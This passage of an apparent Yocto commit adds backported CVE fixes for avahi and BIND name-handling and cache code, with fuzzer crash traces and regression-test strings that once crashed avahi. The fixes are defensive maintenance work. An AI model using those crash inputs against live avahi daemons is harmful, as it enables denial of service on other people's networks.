37+ "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
38+ "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
39+ "}.?.?.?.}.=.?.?.}");
40+ assert(s == NULL);
41+
42 printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
43 printf("%i\n", avahi_domain_equal("A", "a"));
44
45Index: avahi-0.7/avahi-common/domain.c
46===================================================================
47--- avahi-0.7.orig/avahi-common/domain.c
48+++ avahi-0.7/avahi-common/domain.c
49@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
50 }
51
52 if (!empty) {
53- if (size < 1)
54+ if (size < 2)
55 return NULL;
56
57 *(r++) = '.';
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..403ed6fd6a
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
1From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
2From: Evgeny Vereshchagin <evvers@ya.ru>
3Date: Tue, 19 Sep 2023 03:21:25 +0000
4Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
5
6Fixes:
7```
8==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
9READ of size 1110 at 0x7f9e76f14c16 thread T0
10 #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
11 #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
12 #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
13```
14and
15```
16fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
17==101571== ERROR: libFuzzer: deadly signal
18 #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
19 #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
20 #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
21 #3 0x7f1581d7ebaf (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
22 #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
23 #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
24 #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
25 #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
26 #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
27 #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
28```
29
30It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
31
32Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
33Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
34CVE: CVE-2023-38470 #Follow-up patch
35Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
36---
37 avahi-common/domain.c | 3 ++-
38 1 file changed, 2 insertions(+), 1 deletion(-)
39
40Index: avahi-0.7/avahi-common/domain.c
41===================================================================
42--- avahi-0.7.orig/avahi-common/domain.c
43+++ avahi-0.7/avahi-common/domain.c
44@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
45 } else
46 empty = 0;
47
48- avahi_escape_label(label, strlen(label), &r, &size);
49+ if (!(avahi_escape_label(label, strlen(label), &r, &size)))
50+ return NULL;
51 }
52
53 return ret_s;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..c8d6a66174
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
1From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
2From: Michal Sekletar <msekleta@redhat.com>
3Date: Mon, 23 Oct 2023 13:38:35 +0200
4Subject: [PATCH] core: extract host name using avahi_unescape_label()
5
6Previously we could create invalid escape sequence when we split the
7string on dot. For example, from valid host name "foo\\.bar" we have
8created invalid name "foo\\" and tried to set that as the host name
9which crashed the daemon.
10
11Fixes #453
12
13CVE-2023-38471
14
15Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
16Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
17CVE: CVE-2023-38471
18Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
19---
20 avahi-core/server.c | 27 +++++++++++++++++++++------
21 1 file changed, 21 insertions(+), 6 deletions(-)
22
23Index: avahi-0.7/avahi-core/server.c
24===================================================================
25--- avahi-0.7.orig/avahi-core/server.c
26+++ avahi-0.7/avahi-core/server.c
27@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
28 }
29
30 int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
31- char *hn = NULL;
32+ char label_escaped[AVAHI_LABEL_MAX*4+1];
33+ char label[AVAHI_LABEL_MAX];
34+ char *hn = NULL, *h;
35+ size_t len;
36+
37 assert(s);
38
39 AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
40@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
41 else
42 hn = avahi_normalize_name_strdup(host_name);
43
44- hn[strcspn(hn, ".")] = 0;
45+ h = hn;
46+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
47+ avahi_free(h);
48+ return AVAHI_ERR_INVALID_HOST_NAME;
49+ }
50+
51+ avahi_free(h);
52
53- if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
54- avahi_free(hn);
55+ h = label_escaped;
56+ len = sizeof(label_escaped);
57+ if (!avahi_escape_label(label, strlen(label), &h, &len))
58+ return AVAHI_ERR_INVALID_HOST_NAME;
59+
60+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
61 return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
62- }
63
64 withdraw_host_rrs(s);
65
66 avahi_free(s->host_name);
67- s->host_name = hn;
68+ s->host_name = avahi_strdup(label_escaped);
69+ if (!s->host_name)
70+ return AVAHI_ERR_NO_MEMORY;
71
72 update_fqdn(s);
73
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..a789b144ed
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
1From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
2From: Evgeny Vereshchagin <evvers@ya.ru>
3Date: Tue, 24 Oct 2023 22:04:51 +0000
4Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
5
6It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
7
8Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
9Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
10CVE: CVE-2023-38471 #Follow-up Patch
11Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
12---
13 avahi-core/server.c | 9 ++++++---
14 1 file changed, 6 insertions(+), 3 deletions(-)
15
16Index: avahi-0.7/avahi-core/server.c
17===================================================================
18--- avahi-0.7.orig/avahi-core/server.c
19+++ avahi-0.7/avahi-core/server.c
20@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
21 else
22 hn = avahi_normalize_name_strdup(host_name);
23
24+ if (!hn)
25+ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
26+
27 h = hn;
28 if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
29 avahi_free(h);
30- return AVAHI_ERR_INVALID_HOST_NAME;
31+ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
32 }
33
34 avahi_free(h);
35@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
36 h = label_escaped;
37 len = sizeof(label_escaped);
38 if (!avahi_escape_label(label, strlen(label), &h, &len))
39- return AVAHI_ERR_INVALID_HOST_NAME;
40+ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
41
42 if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
43 return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
44@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
45 avahi_free(s->host_name);
46 s->host_name = avahi_strdup(label_escaped);
47 if (!s->host_name)
48- return AVAHI_ERR_NO_MEMORY;
49+ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
50
51 update_fqdn(s);
52
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..f49d990a42
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
1From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
2From: Michal Sekletar <msekleta@redhat.com>
3Date: Thu, 19 Oct 2023 17:36:44 +0200
4Subject: [PATCH] core: make sure there is rdata to process before parsing it
5
6Fixes #452
7
8CVE-2023-38472
9
10Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
11Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
12CVE: CVE-2023-38472
13Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
14---
15 avahi-client/client-test.c | 3 +++
16 avahi-daemon/dbus-entry-group.c | 2 +-
17 2 files changed, 4 insertions(+), 1 deletion(-)
18
19Index: avahi-0.7/avahi-client/client-test.c
20===================================================================
21--- avahi-0.7.orig/avahi-client/client-test.c
22+++ avahi-0.7/avahi-client/client-test.c
23@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
24 assert(error == AVAHI_ERR_INVALID_RECORD);
25 avahi_string_list_free(txt);
26
27+ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
28+ assert(error != AVAHI_OK);
29+
30 avahi_entry_group_commit (group);
31
32 domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
33Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
34===================================================================
35--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
36+++ avahi-0.7/avahi-daemon/dbus-entry-group.c
37@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
38 if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
39 return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
40
41- if (avahi_rdata_parse (r, rdata, size) < 0) {
42+ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
43 avahi_record_unref (r);
44 return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
45 }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..59f6806c85
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
1From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
2From: Michal Sekletar <msekleta@redhat.com>
3Date: Wed, 11 Oct 2023 17:45:44 +0200
4Subject: [PATCH] common: derive alternative host name from its unescaped
5 version
6
7Normalization of input makes sure we don't have to deal with special
8cases like unescaped dot at the end of label.
9
10Fixes #451 #487
11CVE-2023-38473
12
13Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
14Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
15CVE: CVE-2023-38473
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 avahi-common/alternative-test.c | 3 +++
19 avahi-common/alternative.c | 27 +++++++++++++++++++--------
20 2 files changed, 22 insertions(+), 8 deletions(-)
21
22Index: avahi-0.7/avahi-common/alternative-test.c
23===================================================================
24--- avahi-0.7.orig/avahi-common/alternative-test.c
25+++ avahi-0.7/avahi-common/alternative-test.c
26@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
27 const char* const test_strings[] = {
28 "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
29 "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
30+ ").",
31+ "\\.",
32+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
33 "gurke",
34 "-",
35 " #",
36Index: avahi-0.7/avahi-common/alternative.c
37===================================================================
38--- avahi-0.7.orig/avahi-common/alternative.c
39+++ avahi-0.7/avahi-common/alternative.c
40@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
41 }
42
43 char *avahi_alternative_host_name(const char *s) {
44+ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
45+ char *alt, *r, *ret;
46 const char *e;
47- char *r;
48+ size_t len;
49
50 assert(s);
51
52 if (!avahi_is_valid_host_name(s))
53 return NULL;
54
55- if ((e = strrchr(s, '-'))) {
56+ if (!avahi_unescape_label(&s, label, sizeof(label)))
57+ return NULL;
58+
59+ if ((e = strrchr(label, '-'))) {
60 const char *p;
61
62 e++;
63@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
64
65 if (e) {
66 char *c, *m;
67- size_t l;
68 int n;
69
70 n = atoi(e)+1;
71 if (!(m = avahi_strdup_printf("%i", n)))
72 return NULL;
73
74- l = e-s-1;
75+ len = e-label-1;
76
77- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
78- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
79+ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
80+ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
81
82- if (!(c = avahi_strndup(s, l))) {
83+ if (!(c = avahi_strndup(label, len))) {
84 avahi_free(m);
85 return NULL;
86 }
87@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
88 } else {
89 char *c;
90
91- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
92+ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
93 return NULL;
94
95 drop_incomplete_utf8(c);
96@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
97 avahi_free(c);
98 }
99
100+ alt = alternative;
101+ len = sizeof(alternative);
102+ ret = avahi_escape_label(r, strlen(r), &alt, &len);
103+
104+ avahi_free(r);
105+ r = avahi_strdup(ret);
106+
107 assert(avahi_is_valid_host_name(r));
108
109 return r;
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
new file mode 100644
index 0000000000..940c6776d3
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch
@@ -0,0 +1,67 @@
1From 36c878a0124973f29b7ca49e6bb18310f9b2601f Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Micha=C5=82=20K=C4=99pie=C5=84?= <michal@isc.org>
3Date: Thu, 8 Sep 2022 11:11:30 +0200
4Subject: [PATCH 1/3] Bound the amount of work performed for delegations
5
6Limit the amount of database lookups that can be triggered in
7fctx_getaddresses() (i.e. when determining the name server addresses to
8query next) by setting a hard limit on the number of NS RRs processed
9for any delegation encountered. Without any limit in place, named can
10be forced to perform large amounts of database lookups per each query
11received, which severely impacts resolver performance.
12
13The limit used (20) is an arbitrary value that is considered to be big
14enough for any sane DNS delegation.
15
16(cherry picked from commit 3a44097fd6c6c260765b628cd1d2c9cb7efb0b2a)
17
18Upstream-Status: Backport
19CVE: CVE-2022-2795
20Reference to upstream patch:
21https://gitlab.isc.org/isc-projects/bind9/-/commit/bf2ea6d8525bfd96a84dad221ba9e004adb710a8
22
23Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
24---
25 lib/dns/resolver.c | 12 ++++++++++++
26 1 file changed, 12 insertions(+)
27
28diff --git a/lib/dns/resolver.c b/lib/dns/resolver.c
29index 8ae9a993bbd7..ac9a9ef5d009 100644
30--- a/lib/dns/resolver.c
31+++ b/lib/dns/resolver.c
32@@ -180,6 +180,12 @@
33 */
34 #define NS_FAIL_LIMIT 4
35 #define NS_RR_LIMIT 5
36+/*
37+ * IP address lookups are performed for at most NS_PROCESSING_LIMIT NS RRs in
38+ * any NS RRset encountered, to avoid excessive resource use while processing
39+ * large delegations.
40+ */
41+#define NS_PROCESSING_LIMIT 20
42
43 /* Number of hash buckets for zone counters */
44 #ifndef RES_DOMAIN_BUCKETS
45@@ -3318,6 +3324,7 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
46 bool need_alternate = false;
47 bool all_spilled = true;
48 unsigned int no_addresses = 0;
49+ unsigned int ns_processed = 0;
50
51 FCTXTRACE5("getaddresses", "fctx->depth=", fctx->depth);
52
53@@ -3504,6 +3511,11 @@ fctx_getaddresses(fetchctx_t *fctx, bool badcache) {
54
55 dns_rdata_reset(&rdata);
56 dns_rdata_freestruct(&ns);
57+
58+ if (++ns_processed >= NS_PROCESSING_LIMIT) {
59+ result = ISC_R_NOMORE;
60+ break;
61+ }
62 }
63 if (result != ISC_R_NOMORE) {
64 return (result);
65--
662.34.1
67
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
new file mode 100644
index 0000000000..0ef87fd260
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch
@@ -0,0 +1,31 @@
1From ef3d1a84ff807eea27b4fef601a15932c5ffbfbf Mon Sep 17 00:00:00 2001
2From: Mark Andrews <marka@isc.org>
3Date: Thu, 11 Aug 2022 15:15:34 +1000
4Subject: [PATCH 2/3] Free eckey on siglen mismatch
5
6Upstream-Status: Backport
7CVE: CVE-2022-38177
8Reference to upstream patch:
9https://gitlab.isc.org/isc-projects/bind9/-/commit/5b2282afff760b1ed3471f6666bdfe8e1d34e590
10
11Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
12---
13 lib/dns/opensslecdsa_link.c | 2 +-
14 1 file changed, 1 insertion(+), 1 deletion(-)
15
16diff --git a/lib/dns/opensslecdsa_link.c b/lib/dns/opensslecdsa_link.c
17index 83b5b51cd78c..7576e04ac635 100644
18--- a/lib/dns/opensslecdsa_link.c
19+++ b/lib/dns/opensslecdsa_link.c
20@@ -224,7 +224,7 @@ opensslecdsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
21 siglen = DNS_SIG_ECDSA384SIZE;
22
23 if (sig->length != siglen)
24- return (DST_R_VERIFYFAILURE);
25+ DST_RET(DST_R_VERIFYFAILURE);
26
27 if (!EVP_DigestFinal_ex(evp_md_ctx, digest, &dgstlen))
28 DST_RET (dst__openssl_toresult3(dctx->category,
29--
302.34.1
31
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
new file mode 100644
index 0000000000..e0b398e24a
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch
@@ -0,0 +1,33 @@
1From 65f5b2f0162d5d2ab25f463aa14a8bae71ace3d9 Mon Sep 17 00:00:00 2001
2From: Mark Andrews <marka@isc.org>
3Date: Thu, 11 Aug 2022 15:28:13 +1000
4Subject: [PATCH 3/3] Free ctx on invalid siglen
5
6(cherry picked from commit 6ddb480a84836641a0711768a94122972c166825)
7
8Upstream-Status: Backport
9CVE: CVE-2022-38178
10Reference to upstream patch:
11https://gitlab.isc.org/isc-projects/bind9/-/commit/1af23378ebb11da2eb0f412e4563d6
12
13Signed-off-by: Mathieu Dubois-Briand <mbriand@witekio.com>
14---
15 lib/dns/openssleddsa_link.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/lib/dns/openssleddsa_link.c b/lib/dns/openssleddsa_link.c
19index 8b115ec283f0..b4fcd607c131 100644
20--- a/lib/dns/openssleddsa_link.c
21+++ b/lib/dns/openssleddsa_link.c
22@@ -325,7 +325,7 @@ openssleddsa_verify(dst_context_t *dctx, const isc_region_t *sig) {
23 siglen = DNS_SIG_ED448SIZE;
24
25 if (sig->length != siglen)
26- return (DST_R_VERIFYFAILURE);
27+ DST_RET(ISC_R_NOTIMPLEMENTED);
28
29 isc_buffer_usedregion(buf, &tbsreg);
30
31--
322.34.1
33
diff --git a/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
new file mode 100644
index 0000000000..6f6c104530
--- /dev/null
+++ b/meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch
@@ -0,0 +1,166 @@
1
2Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/b/bind9/bind9_9.11.5.P4+dfsg-5.1+deb10u9.debian.tar.xz
3Upstream patch https://downloads.isc.org/isc/bind9/9.16.42/patches/0001-CVE-2023-2828.patch]
4Upstream Commit: https://github.com/isc-projects/bind9/commit/da0eafcdee52147e72d407cc3b9f179378ee1d3a
5CVE: CVE-2023-2828
6Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
7
8---
9 lib/dns/rbtdb.c | 106 +++++++++++++++++++++++++++++++++-----------------------
10 1 file changed, 63 insertions(+), 43 deletions(-)
11
12diff --git a/lib/dns/rbtdb.c b/lib/dns/rbtdb.c
13index b1b928c..3165e26 100644
14--- a/lib/dns/rbtdb.c
15+++ b/lib/dns/rbtdb.c
16@@ -792,7 +792,7 @@ static void update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
17 static void expire_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
18 bool tree_locked, expire_t reason);
19 static void overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
20- isc_stdtime_t now, bool tree_locked);
21+ size_t purgesize, bool tree_locked);
22 static isc_result_t resign_insert(dns_rbtdb_t *rbtdb, int idx,
23 rdatasetheader_t *newheader);
24 static void resign_delete(dns_rbtdb_t *rbtdb, rbtdb_version_t *version,
25@@ -6784,6 +6784,16 @@ addclosest(dns_rbtdb_t *rbtdb, rdatasetheader_t *newheader,
26
27 static dns_dbmethods_t zone_methods;
28
29+static size_t
30+rdataset_size(rdatasetheader_t *header) {
31+ if (!NONEXISTENT(header)) {
32+ return (dns_rdataslab_size((unsigned char *)header,
33+ sizeof(*header)));
34+ }
35+
36+ return (sizeof(*header));
37+}
38+
39 static isc_result_t
40 addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
41 isc_stdtime_t now, dns_rdataset_t *rdataset, unsigned int options,
42@@ -6932,7 +6942,8 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
43 }
44
45 if (cache_is_overmem)
46- overmem_purge(rbtdb, rbtnode->locknum, now, tree_locked);
47+ overmem_purge(rbtdb, rbtnode->locknum, rdataset_size(newheader),
48+ tree_locked);
49
50 NODE_LOCK(&rbtdb->node_locks[rbtnode->locknum].lock,
51 isc_rwlocktype_write);
52@@ -6947,9 +6958,14 @@ addrdataset(dns_db_t *db, dns_dbnode_t *node, dns_dbversion_t *version,
53 cleanup_dead_nodes(rbtdb, rbtnode->locknum);
54
55 header = isc_heap_element(rbtdb->heaps[rbtnode->locknum], 1);
56- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL)
57- expire_header(rbtdb, header, tree_locked,
58- expire_ttl);
59+ if (header != NULL) {
60+ dns_ttl_t rdh_ttl = header->rdh_ttl;
61+
62+ if (rdh_ttl < now - RBTDB_VIRTUAL) {
63+ expire_header(rbtdb, header, tree_locked,
64+ expire_ttl);
65+ }
66+ }
67
68 /*
69 * If we've been holding a write lock on the tree just for
70@@ -10388,54 +10404,58 @@ update_header(dns_rbtdb_t *rbtdb, rdatasetheader_t *header,
71 ISC_LIST_PREPEND(rbtdb->rdatasets[header->node->locknum], header, link);
72 }
73
74+static size_t
75+expire_lru_headers(dns_rbtdb_t *rbtdb, unsigned int locknum, size_t purgesize,
76+ bool tree_locked) {
77+ rdatasetheader_t *header, *header_prev;
78+ size_t purged = 0;
79+
80+ for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
81+ header != NULL && purged <= purgesize; header = header_prev)
82+ {
83+ header_prev = ISC_LIST_PREV(header, link);
84+ /*
85+ * Unlink the entry at this point to avoid checking it
86+ * again even if it's currently used someone else and
87+ * cannot be purged at this moment. This entry won't be
88+ * referenced any more (so unlinking is safe) since the
89+ * TTL was reset to 0.
90+ */
91+ ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header, link);
92+ size_t header_size = rdataset_size(header);
93+ expire_header(rbtdb, header, tree_locked, expire_lru);
94+ purged += header_size;
95+ }
96+
97+ return (purged);
98+}
99+
100 /*%
101- * Purge some expired and/or stale (i.e. unused for some period) cache entries
102- * under an overmem condition. To recover from this condition quickly, up to
103- * 2 entries will be purged. This process is triggered while adding a new
104- * entry, and we specifically avoid purging entries in the same LRU bucket as
105- * the one to which the new entry will belong. Otherwise, we might purge
106- * entries of the same name of different RR types while adding RRsets from a
107- * single response (consider the case where we're adding A and AAAA glue records
108- * of the same NS name).
109- */
110+ * Purge some stale (i.e. unused for some period - LRU based cleaning) cache
111+ * entries under the overmem condition. To recover from this condition quickly,
112+ * we cleanup entries up to the size of newly added rdata (passed as purgesize).
113+ *
114+ * This process is triggered while adding a new entry, and we specifically avoid
115+ * purging entries in the same LRU bucket as the one to which the new entry will
116+ * belong. Otherwise, we might purge entries of the same name of different RR
117+ * types while adding RRsets from a single response (consider the case where
118+ * we're adding A and AAAA glue records of the same NS name).
119+*/
120 static void
121-overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start,
122- isc_stdtime_t now, bool tree_locked)
123+overmem_purge(dns_rbtdb_t *rbtdb, unsigned int locknum_start, size_t purgesize,
124+ bool tree_locked)
125 {
126- rdatasetheader_t *header, *header_prev;
127 unsigned int locknum;
128- int purgecount = 2;
129+ size_t purged = 0;
130
131 for (locknum = (locknum_start + 1) % rbtdb->node_lock_count;
132- locknum != locknum_start && purgecount > 0;
133+ locknum != locknum_start && purged <= purgesize;
134 locknum = (locknum + 1) % rbtdb->node_lock_count) {
135 NODE_LOCK(&rbtdb->node_locks[locknum].lock,
136 isc_rwlocktype_write);
137
138- header = isc_heap_element(rbtdb->heaps[locknum], 1);
139- if (header && header->rdh_ttl < now - RBTDB_VIRTUAL) {
140- expire_header(rbtdb, header, tree_locked,
141- expire_ttl);
142- purgecount--;
143- }
144-
145- for (header = ISC_LIST_TAIL(rbtdb->rdatasets[locknum]);
146- header != NULL && purgecount > 0;
147- header = header_prev) {
148- header_prev = ISC_LIST_PREV(header, link);
149- /*
150- * Unlink the entry at this point to avoid checking it
151- * again even if it's currently used someone else and
152- * cannot be purged at this moment. This entry won't be
153- * referenced any more (so unlinking is safe) since the
154- * TTL was reset to 0.
155- */
156- ISC_LIST_UNLINK(rbtdb->rdatasets[locknum], header,
157- link);
158- expire_header(rbtdb, header, tree_locked,
159- expire_lru);
160- purgecount--;
161- }
162+ purged += expire_lru_headers(rbtdb, locknum, purgesize - purged,
163+ tree_locked);
164
